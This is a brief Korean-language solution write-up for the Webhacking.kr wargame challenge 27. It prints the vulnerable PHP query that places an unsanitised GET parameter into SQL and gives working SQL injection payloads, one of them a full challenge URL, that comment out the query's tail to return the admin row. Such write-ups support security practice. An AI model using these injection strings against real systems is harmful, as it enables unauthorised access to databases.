Webhacking.kr 27

$q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error");

if($q[id]=="guest") echo("guest");

if($q[id]=="admin") @solve();

소스는 위와 같다. 

32)+OR+no+like+1%20--%20

http://webhacking.kr/challenge/web/web-12/index.php?no=32)%20or%20no%20like%202%20--%20

no	id
2	admin
1	guest